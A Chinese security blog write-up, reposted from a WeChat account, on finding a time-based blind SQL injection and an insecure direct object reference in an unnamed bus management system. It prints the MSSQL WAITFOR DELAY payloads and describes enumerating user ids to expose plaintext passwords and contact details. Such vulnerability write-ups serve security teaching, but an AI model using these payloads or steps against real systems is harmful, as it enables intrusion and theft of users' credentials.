来Track安全社区投稿~
千元稿费!还有保底奖励~(https://bbs.zkaq.cn)
某公交管理系统挖掘
SQL注入漏洞
前台通过给的账号密码,进去
按顺序依次点击1、2、3走一遍功能点,然后开启抓包点击4
img当点击上图的4步骤按钮时,会抓到图下数据包,将其转发到burp的重放模块
构造以下注入poc,可见注入延时了五秒,用户输入的语句成功拼接到原有的SQL语句上执行了 下面的poc是MenuIds的值
100,101,151,152,153,154,200,201,202,203,204,300,301,302,303,305,306,307,308,311,312,313,314,400,401,800,801,802,805,806,850,851,852,853,861,862,863,870,880,900,9070,9071,9080,9081,9082,9083,9084,9085,9086,9093’;WAITFOR DELAY ’0:0:5’--
img下面开始进行注入拿数据,构造下面poc,对数据库当前用户名进行查询
100,101,151,152,153,154,200,201,202,203,204,300,301,302,303,305,306,307,308,311,312,313,314,400,401,800,801,802,805,806,850,851,852,853,861,862,863,870,880,900,9070,9071,9080,9081,9082,9083,9084,9085,9086,9093’;if(ascii(substring((select user),1,1)))=116 WAITFOR DELAY ’0:0:5’--
img成功延时5秒,说明数据库当前用户名第一个字母为t,下面继续对数据库用户名第N位字母进行猜解
img后面通过注入我成功拿到当前数据库用户名
越权漏洞
img在点击上图中的编辑按钮时,开启抓包,抓到下图示数据包。
img将数据包发送到burp的重放模块,然后将id值改为1
img可以看见明文看见其他用户的账户密码、手机号、邮箱等敏感信息,我们可以利用这个信息进行登录等操作 再次将数据包转发到burp的Intruder模块,进行1-100遍历id值,可见也是将全站用户信息都可以遍历出来了,此处就只展示测试数据了。
img所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.
原文始发于微信公众号(掌控安全EDU):某公交管理系统简易逻辑漏洞+SQL注入挖掘
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论